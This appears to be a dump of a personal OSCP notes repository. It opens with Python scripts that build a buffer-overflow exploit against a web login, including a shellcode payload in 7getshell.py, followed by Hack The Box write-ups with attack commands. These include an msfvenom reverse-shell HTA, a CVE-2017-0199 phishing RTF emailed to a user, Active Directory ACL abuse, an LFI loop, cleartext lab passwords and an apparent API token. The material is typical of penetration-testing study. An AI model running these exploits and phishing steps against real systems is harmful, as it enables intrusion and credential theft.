+= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" 19 | sock_buffer += "Accept-Language: en-US,en;q=0.5\r\n" 20 | sock_buffer += "Referer: http://192.168.196.10/login\r\n" 21 | sock_buffer += "Connection: close\r\n" 22 | sock_buffer += "Content-Type: application/x-www-form-urlencoded\r\n" 23 | sock_buffer += "Content-Length: " + str(len(content)) + "\r\n" 24 | sock_buffer += "\r\n" 25 | sock_buffer += content 26 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 27 | s.connect(("192.168.196.10", 80)) 28 | s.send(sock_buffer) 29 | s.close() 30 | print "\nDone!" 31 | except: 32 | print "Could not connect!" 33 | -------------------------------------------------------------------------------- /scripts/wbof/4checkbad.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | import time 4 | import sys 5 | 6 | badchars = ( 7 | "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10" 8 | "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" 9 | "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30" 10 | "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 11 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" 12 | "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60" 13 | "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70" 14 | "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80" 15 | "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90" 16 | "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0" 17 | "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0" 18 | "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0" 19 | "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0" 20 | "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" 21 | "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0" 22 | "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 23 | try: 24 | print "\nSending evil buffer " 25 | filter = "A" * 780 26 | eip = "B" * 4 27 | offset = "C" * 4 28 | # buffer_end = "D" * (1500 - len(filter) - len(eip) - len(offset)) 29 | inputBuffer = filter + eip + offset + buffer_end 30 | content = "username=" + inputBuffer + "&password=A" 31 | sock_buffer = "POST /login HTTP/1.1\r\n" 32 | sock_buffer += "Host: 192.168.196.10\r\n" 33 | sock_buffer += "User - Agent: Mozilla / 5.0 (X11; Linux_86_64; rv: 52.0) Gecko / 20100101Firefox / 52.0\r\n" 34 | sock_buffer += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" 35 | sock_buffer += "Accept-Language: en-US,en;q=0.5\r\n" 36 | sock_buffer += "Referer: http://192.168.196.10/login\r\n" 37 | sock_buffer += "Connection: close\r\n" 38 | sock_buffer += "Content-Type: application/x-www-form-urlencoded\r\n" 39 | sock_buffer += "Content-Length: " + str(len(content)) + "\r\n" 40 | sock_buffer += "\r\n" 41 | sock_buffer += content 42 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 43 | s.connect(("192.168.196.10", 80)) 44 | s.send(sock_buffer) 45 | s.close() 46 | print "\nDone!" 47 | except: 48 | print "Could not connect!" 49 | -------------------------------------------------------------------------------- /scripts/wbof/5jmpesp.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | import time 4 | import sys 5 | 6 | 7 | try: 8 | print "\nSending evil buffer " 9 | filter = "A" * 780 10 | eip = "\x83\x0c\x09\x10" 11 | offset = "C" * 4 12 | buffer_end = "D" * (1500 - len(filter) - len(eip) - len(offset)) 13 | inputBuffer = filter + eip + offset + buffer_end 14 | content = "username=" + inputBuffer + "&password=A" 15 | sock_buffer = "POST /login HTTP/1.1\r\n" 16 | sock_buffer += "Host: 192.168.196.10\r\n" 17 | sock_buffer += "User - Agent: Mozilla / 5.0 (X11; Linux_86_64; rv: 52.0) Gecko / 20100101Firefox / 52.0\r\n" 18 | sock_buffer += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" 19 | sock_buffer += "Accept-Language: en-US,en;q=0.5\r\n" 20 | sock_buffer += "Referer: http://192.168.196.10/login\r\n" 21 | sock_buffer += "Connection: close\r\n" 22 | sock_buffer += "Content-Type: application/x-www-form-urlencoded\r\n" 23 | sock_buffer += "Content-Length: " + str(len(content)) + "\r\n" 24 | sock_buffer += "\r\n" 25 | sock_buffer += content 26 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 27 | s.connect(("192.168.196.10", 80)) 28 | s.send(sock_buffer) 29 | s.close() 30 | print "\nDone!" 31 | except: 32 | print "Could not connect!" 33 | -------------------------------------------------------------------------------- /scripts/wbof/7getshell.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | import time 4 | import sys 5 | 6 | shellcode = ("\xda\xd0\xbb\x32\xae\xb0\x1b\xd9\x74\x24\xf4\x5a\x33\xc9\xb1" 7 | "\x52\x31\x5a\x17\x03\x5a\x17\x83\xf0\xaa\x52\xee\x08\x5a\x10" 8 | "\x11\xf0\x9b\x75\x9b\x15\xaa\xb5\xff\x5e\x9d\x05\x8b\x32\x12" 9 | "\xed\xd9\xa6\xa1\x83\xf5\xc9\x02\x29\x20\xe4\x93\x02\x10\x67" 10 | "\x10\x59\x45\x47\x29\x92\x98\x86\x6e\xcf\x51\xda\x27\x9b\xc4" 11 | "\xca\x4c\xd1\xd4\x61\x1e\xf7\x5c\x96\xd7\xf6\x4d\x09\x63\xa1" 12 | "\x4d\xa8\xa0\xd9\xc7\xb2\xa5\xe4\x9e\x49\x1d\x92\x20\x9b\x6f" 13 | "\x5b\x8e\xe2\x5f\xae\xce\x23\x67\x51\xa5\x5d\x9b\xec\xbe\x9a" 14 | "\xe1\x2a\x4a\x38\x41\xb8\xec\xe4\x73\x6d\x6a\x6f\x7f\xda\xf8" 15 | "\x37\x9c\xdd\x2d\x4c\x98\x56\xd0\x82\x28\x2c\xf7\x06\x70\xf6" 16 | "\x96\x1f\xdc\x59\xa6\x7f\xbf\x06\x02\xf4\x52\x52\x3f\x57\x3b" 17 | "\x97\x72\x67\xbb\xbf\x05\x14\x89\x60\xbe\xb2\xa1\xe9\x18\x45" 18 | "\xc5\xc3\xdd\xd9\x38\xec\x1d\xf0\xfe\xb8\x4d\x6a\xd6\xc0\x05" 19 | "\x6a\xd7\x14\x89\x3a\x77\xc7\x6a\xea\x37\xb7\x02\xe0\xb7\xe8" 20 | "\x33\x0b\x12\x81\xde\xf6\xf5\x6e\xb6\x8f\xc1\x07\xc5\x6f\xdb" 21 | "\x8b\x40\x89\xb1\x23\x05\x02\x2e\xdd\x0c\xd8\xcf\x22\x9b\xa5" 22 | "\xd0\xa9\x28\x5a\x9e\x59\x44\x48\x77\xaa\x13\x32\xde\xb5\x89" 23 | "\x5a\xbc\x24\x56\x9a\xcb\x54\xc1\xcd\x9c\xab\x18\x9b\x30\x95" 24 | "\xb2\xb9\xc8\x43\xfc\x79\x17\xb0\x03\x80\xda\x8c\x27\x92\x22" 25 | "\x0c\x6c\xc6\xfa\x5b\x3a\xb0\xbc\x35\x8c\x6a\x17\xe9\x46\xfa" 26 | "\xee\xc1\x58\x7c\xef\x0f\x2f\x60\x5e\xe6\x76\x9f\x6f\x6e\x7f" 27 | "\xd8\x8d\x0e\x80\x33\x16\x3e\xcb\x19\x3f\xd7\x92\xc8\x7d\xba" 28 | "\x24\x27\x41\xc3\xa6\xcd\x3a\x30\xb6\xa4\x3f\x7c\x70\x55\x32" 29 | "\xed\x15\x59\xe1\x0e\x3c") 30 | try: 31 | print "\nSending evil buffer " 32 | filter = "A" * 780 33 | eip = "\x83\x0c\x09\x10" 34 | offset = "C" * 4 35 | nops = "\x90" * 10 36 | inputBuffer = filter + eip + offset + nops + shellcode 37 | content = "username=" + inputBuffer + "&password=A" 38 | sock_buffer = "POST /login HTTP/1.1\r\n" 39 | sock_buffer += "Host: 192.168.196.10\r\n" 40 | sock_buffer += "User - Agent: Mozilla / 5.0 (X11; Linux_86_64; rv: 52.0) Gecko / 20100101Firefox / 52.0\r\n" 41 | sock_buffer += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" 42 | sock_buffer += "Accept-Language: en-US,en;q=0.5\r\n" 43 | sock_buffer += "Referer: http://192.168.196.10/login\r\n" 44 | sock_buffer += "Connection: close\r\n" 45 | sock_buffer += "Content-Type: application/x-www-form-urlencoded\r\n" 46 | sock_buffer += "Content-Length: " + str(len(content)) + "\r\n" 47 | sock_buffer += "\r\n" 48 | sock_buffer += content 49 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 50 | s.connect(("192.168.196.10", 80)) 51 | s.send(sock_buffer) 52 | s.close() 53 | print "\nDone!" 54 | except: 55 | print "Could not connect!" 56 | -------------------------------------------------------------------------------- /scripts/wbof/Asxtomp3converter.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/19oos/My-oscp-notes/5e1e73735814f5ca792ddbe6adb7ef05d13c3409/scripts/wbof/Asxtomp3converter.exe -------------------------------------------------------------------------------- /scripts/wbof/asxbof.md: -------------------------------------------------------------------------------- 1 | 2 | powershell -c "(new-object System.Net.WebClient).DownloadFile('http://192.168.3.214/asx2mp3.m3u', 'C:\Users\Derek\Desktop\asx2mp3.m3u')" 3 | 4 | powershell -c "(new-object System.Net.WebClient).DownloadFile('http://192.168.3.214/Asxtomp3converter.exe', 'C:\Users\Derek\Desktop\Asxtomp3converter.exe')" 5 | -------------------------------------------------------------------------------- /writeup/htb/ad-acute.md: -------------------------------------------------------------------------------- 1 | # Summary 2 | 3 | 4 | 5 | ## about target 6 | 7 | tip: 10.129.136.40 8 | 9 | hostname: Acute 10 | 11 | Difficulty: Hard 12 | 13 | 14 | 15 | ## about attack 16 | 17 | + powershell invoke-command 18 | + powershell pscredential 19 | + 20 | 21 | 22 | 23 | 24 | 25 | **attack note** 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | # Enum 34 | 35 | ## nmap scan 36 | 37 | 38 | 39 | ```bash 40 | nmap -p- --min-rate=1000 -T4 -oN nmap.light $tip 41 | export port=$(cat nmap.light | grep ^[0-9] | cut -d "/" -f 1 | tr "\n" "," | sed s/,$//) 42 | sudo nmap -A -O -p$port -sC -sV -T4 -oN nmap.heavy $tip 43 | 44 | 45 | ``` 46 | 47 | 48 | 49 | 50 | 51 | ![image-20230124120247756](./images/image-20230124120247756.png) 52 | 53 | 54 | 55 | 56 | 57 | ![image-20230124120341960](./images/image-20230124120341960.png) 58 | 59 | 60 | 61 | ![image-20230124121515607](./images/image-20230124121515607.png) 62 | 63 | 64 | 65 | ![image-20230124130830153](./images/image-20230124130830153.png) 66 | 67 | 68 | 69 | # Foothold 70 | 71 | 72 | 73 | 74 | 75 | # Privesc 76 | 77 | 78 | 79 | 80 | 81 | ## proof 82 | 83 | ```bash 84 | 85 | 86 | ``` 87 | 88 | 89 | 90 | -------------------------------------------------------------------------------- /writeup/htb/ad-cascade.md: -------------------------------------------------------------------------------- 1 | # Summary 2 | 3 | 4 | 5 | ## about target 6 | 7 | tip: 10.129.236.97 8 | 9 | hostname: Cascade 10 | 11 | Difficulty: Medium 12 | 13 | 14 | 15 | ## about attack 16 | 17 | + ldapsearch anonymous log, grep pass/pwd/cred/password 18 | + Online tools, cyberchef. decrypt and decode 19 | + Ad group recycle bin, enum deleted ad object. 20 | + Smb netlogon share, could contains creds in vbs file. 21 | 22 | 23 | 24 | 25 | 26 | **attack note** 27 | 28 | ```bash 29 | Cascade / 10.129.236.97 30 | 31 | PORT STATE SERVICE VERSION 32 | 53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1) 33 | | dns-nsid: 34 | |_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39) 35 | 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-12-21 15:36:09Z) 36 | 135/tcp open msrpc Microsoft Windows RPC 37 | 139/tcp open netbios-ssn? 38 | 389/tcp filtered ldap 39 | 445/tcp open microsoft-ds? 40 | 636/tcp open tcpwrapped 41 | 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name) 42 | 3269/tcp open tcpwrapped 43 | 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 44 | |_http-server-header: Microsoft-HTTPAPI/2.0 45 | |_http-title: Not Found 46 | 49154/tcp open unknown 47 | 49155/tcp open msrpc Microsoft Windows RPC 48 | 49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49 | 49158/tcp open msrpc Microsoft Windows RPC 50 | 49173/tcp open msrpc Microsoft Windows RPC 51 | 52 | ---- Interesting 53 | -- from namap heavy scan 54 | 3268:Domain: cascade.local 55 | 53:Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1) 56 | 57 | -- from crackmapexec pass-pol 58 | Windows 6.1 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) 59 | 60 | -- domain users and sid from enum4linux 61 | domainuser.list 62 | Domain Name: CASCADE 63 | Domain Sid: S-1-5-21-3332504370-1206983947-1165150453 64 | 65 | -- password, ldap anonymous 66 | r.thompson:clk0bjVldmE=:rY4n5eva 67 | 68 | -- smb data, Vnc install.reg, password s.smith 69 | "Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f 70 | s.smith:sT333ve2 71 | 72 | 73 | 74 | ---- Enum 75 | -- dns, nothing 76 | dig any @$tip cascade.local 77 | dig axfr @$tip cascade.local 78 | 79 | -- rpc 80 | nothing new, same to enum4linux. 81 | 82 | -- smb 83 | no shares. 84 | smbclient -L $tip -U null 85 | smbclient -L $tip -U null -N 86 | smbclient -L $tip -U "" 87 | smbclient -L $tip -U cascguest 88 | smbclient -L $tip -U cascguest -N 89 | smbclient -L $tip -U cascguest -P '' 90 | smbclient -L $tip -U cascguest -N 91 | smbmap -H $tip -u cascguest 92 | smbmap -H $tip -u cascguest -p '' 93 | 94 | -- ldap 95 | 96 | cat ldap-anonymous.log | grep -i pwd 97 | 98 | crackmapexec smb $tip -u r.thompson -p 'rY4n5eva' --shares 99 | 100 | -- ad 101 | # asrepoast 102 | GetNPUsers.py -usersfile domainuser.list -no-pass -dc-ip $tip cascade.local/ -format hashcat -outputfile asreproast.hash 103 | 104 | 105 | -- enum r.thompson 106 | cyberchef, convert 107 | echo '6bcf2a4b6e5aca0f' | xxd -r -p > smith.vncpwd 108 | 109 | 110 | crackmapexec smb $tip -u s.smith -p 'sT333ve2' --shares 111 | 112 | crackmapexec winrm $tip -u s.smith -p 'sT333ve2' 113 | 114 | ---- Foothold 115 | 116 | -- s.smith 117 | 118 | smbclient //$tip/Audit$ -U s.smith%sT333ve2 119 | 120 | evil-winrm -u s.smith -p 'sT333ve2' -i $tip 121 | 122 | ---- System 123 | # query deleted ad object 124 | Get-ADObject -filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects 125 | 126 | # query deleted ad object, tempadmin 127 | Get-ADObject -filter { SAMAccountName -eq "TempAdmin" } -includeDeletedObjects -property * 128 | 129 | evil-winrm -u administrator -p 'baCT3r1aN00dles' -i $tip 130 | ``` 131 | 132 | 133 | 134 | 135 | 136 | 137 | 138 | # Enum 139 | 140 | ## nmap scan 141 | 142 | 143 | 144 | ```bash 145 | nmap -p- --min-rate=1000 -T4 -oN nmap.light $tip 146 | export port=$(cat nmap.light | grep ^[0-9] | cut -d "/" -f 1 | tr "\n" "," | sed s/,$//) 147 | sudo nmap -A -O -p$port -sC -sV -T4 -oN nmap.heavy $tip 148 | 149 | 150 | ``` 151 | 152 | 153 | 154 | 155 | 156 | ![image-20221222010056608](./images/image-20221222010056608.png) 157 | 158 | 159 | 160 | 161 | 162 | ![image-20221222013543004](./images/image-20221222013543004.png) 163 | 164 | 165 | 166 | ![image-20221222075620527](./images/image-20221222075620527.png) 167 | 168 | 169 | 170 | # Foothold 171 | 172 | 173 | 174 | 175 | 176 | # Privesc 177 | 178 | 179 | 180 | 181 | 182 | ## proof 183 | 184 | ```bash 185 | 186 | 187 | ``` 188 | 189 | 190 | 191 | -------------------------------------------------------------------------------- /writeup/htb/ad-reel.md: -------------------------------------------------------------------------------- 1 | # Summary 2 | 3 | 4 | 5 | ## about target 6 | 7 | tip: 10.129. 8 | 9 | hostname: Reel 10 | 11 | Difficulty: Hard 12 | 13 | 14 | 15 | ## about attack 16 | 17 | + hta phishing. generate hta, msvenom and out-hta.ps1 18 | + Writeowner, set owner and resetpassword, exploit 19 | + WriteDacl on groups, exploit: add user to group 20 | + bloodhound, check the firest degree object control 21 | + Pscredential use, cypher and get cleartext pwd. 22 | 23 | 24 | 25 | 26 | 27 | **attack note** 28 | 29 | ```bash 30 | Reel / 10.129.228.124 31 | 32 | 33 | ---- Interesting 34 | 35 | htb\tom:1ts-mag1c!!! 36 | administrator:Cr4ckMeIfYouC4n! 37 | ---- Enum 38 | # ftp enum, anonymous login; found files. 39 | ftp $tip 40 | 41 | exiftool Windows\ Event\ Forwarding.docx 42 | 43 | # smtp enum 44 | ## nmap sc scan, found users. 45 | nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 $tip -oN smtp.nmap 46 | 47 | ## enum user, recheck. 48 | smtp-user-enum -M VRFY -U /usr/share/seclists/Usernames/Names/names.txt -t $tip 49 | 50 | smtp-user-enum -M RCTP -U users.txt -t $ti 51 | 52 | ---- Foothold 53 | msfvenom -p windows/x64/shell_reverse_tcp LHOST=$kip LPORT=443 -f hta-psh -o msfv.hta 54 | 55 | python2 cve-2017-0199_toolkit.py -M gen -w invoice.rtf -u http://10.10.14.90/msfv.hta -t rtf -x 0 56 | 57 | sendEmail -f hack01@megabank.com -t nico@megabank.com -u "Invoice Attached" -m "You are overdue payment" -a invoice.rtf -s $tip -v 58 | 59 | 60 | powershell -c "$cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() | Format-List *" 61 | 62 | Get-ObjectAcl -SamAccountName clair -ResolveGUIDs | ? {$_.ActiveDirectoryRights -eq "GenericAll"} 63 | 64 | ---- System 65 | Set-DomainObjectOwner -identity claire -OwnerIdentity tom 66 | 67 | Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights ResetPassword 68 | 69 | $cred = ConvertTo-SecureString "Hack01@123" -AsPlainText -force 70 | Set-DomainUserPassword -identity claire -accountpassword $cred 71 | ``` 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | # Enum 80 | 81 | ## nmap scan 82 | 83 | 84 | 85 | ```bash 86 | nmap -p- --min-rate=1000 -T4 -oN nmap.light $tip 87 | export port=$(cat nmap.light | grep ^[0-9] | cut -d "/" -f 1 | tr "\n" "," | sed s/,$//) 88 | sudo nmap -A -O -p$port -sC -sV -T4 -oN nmap.heavy $tip 89 | 90 | PORT STATE SERVICE VERSION 91 | 21/tcp open ftp Microsoft ftpd 92 | | ftp-syst: 93 | |_ SYST: Windows_NT 94 | | ftp-anon: Anonymous FTP login allowed (FTP code 230) 95 | |_05-28-18 11:19PM documents 96 | 22/tcp open ssh OpenSSH 7.6 (protocol 2.0) 97 | | ssh-hostkey: 98 | | 2048 8220c3bd16cba29c88871d6c1559eded (RSA) 99 | | 256 232bb80a8c1cf44d8d7e5e6458803345 (ECDSA) 100 | |_ 256 ac8bde251db7d838389b9c16bff63fed (ED25519) 101 | 25/tcp open smtp? 102 | | smtp-commands: REEL, SIZE 20480000, AUTH LOGIN PLAIN, HELP 103 | |_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY 104 | | fingerprint-strings: 105 | | DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, X11Probe: 106 | | 220 Mail Service ready 107 | | FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest: 108 | | 220 Mail Service ready 109 | | sequence of commands 110 | | sequence of commands 111 | | Hello: 112 | | 220 Mail Service ready 113 | | EHLO Invalid domain address. 114 | | Help: 115 | | 220 Mail Service ready 116 | | DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY 117 | | SIPOptions: 118 | | 220 Mail Service ready 119 | | sequence of commands 120 | | sequence of commands 121 | | sequence of commands 122 | | sequence of commands 123 | | sequence of commands 124 | | sequence of commands 125 | | sequence of commands 126 | | sequence of commands 127 | | sequence of commands 128 | | sequence of commands 129 | | sequence of commands 130 | | TerminalServerCookie: 131 | | 220 Mail Service ready 132 | |_ sequence of commands 133 | ``` 134 | 135 | 136 | 137 | 138 | 139 | ![image-20221213232538919](./images/image-20221213232538919.png) 140 | 141 | 142 | 143 | 144 | 145 | # Foothold 146 | 147 | ## shell nico 148 | 149 | 150 | 151 | 152 | 153 | ![image-20221213234723012](./images/image-20221213234723012.png) 154 | 155 | 156 | 157 | ![image-20221213234732346](./images/image-20221213234732346.png) 158 | 159 | 160 | 161 | ## shell tom 162 | 163 | 164 | 165 | 166 | 167 | ![image-20221214215056462](./images/image-20221214215056462.png) 168 | 169 | 170 | 171 | # Privesc 172 | 173 | 174 | 175 | 176 | 177 | ## proof 178 | 179 | ```bash 180 | 181 | 182 | ``` 183 | 184 | 185 | 186 | -------------------------------------------------------------------------------- /writeup/htb/backdoor.md: -------------------------------------------------------------------------------- 1 | # Summary 2 | 3 | 4 | 5 | ## about target 6 | 7 | tip: 10.129.96.68 8 | 9 | hostname: Backdoor 10 | 11 | Difficulty: Easy 12 | 13 | 14 | 15 | ## about attack 16 | 17 | + Lfi, list proc file to find the service cmdline and port. 18 | + gdbserver exploit 19 | + Screen root privesc 20 | 21 | 22 | 23 | 24 | 25 | **attack note** 26 | 27 | ```bash 28 | Backdoor / 10.129.96.68 29 | 30 | 31 | ---- Interesting 32 | -- from 1337, sec_notes/ 33 | 34 | 35 | ---- Enum 36 | 37 | 38 | wpscan --url http://10.129.96.68 --api-token eHmdOsNYBMMTmCxORyxOKVa5MZnegduDGRkGemtaFgo -e ap,u,at -t 10 --plugins-detection aggressive 39 | 40 | for i in $(seq 1 1000); do curl http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/${i}/cmdline --output - | cut -d "/" -f 8- | sed "s/